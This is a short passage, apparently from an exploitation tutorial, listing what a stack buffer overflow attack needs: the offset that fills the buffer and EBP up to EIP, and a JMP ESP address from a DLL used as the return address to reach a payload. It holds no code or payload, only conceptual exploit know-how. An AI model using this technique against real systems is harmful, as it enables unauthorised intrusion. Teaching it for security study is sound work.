To exploit the app and gain access to the target system, we need to know about the things listed in the following table:
Component |
Use |
Offset |
We crashed the application in the previous section. However, to exploit the application, we will need the exact size of the input that is good enough to fill the space + the EBP register, so that whatever we provide after our input goes directly into the EIP register. We refer to the amount of data that is good enough to land us right before the EIP register as the offset. |
Jump address/Ret |
This is the actual address to overwrite in the EIP register. To clarify, this is the address of a JMP ESP instruction from a DLL file that helps to jump to the payload. ... |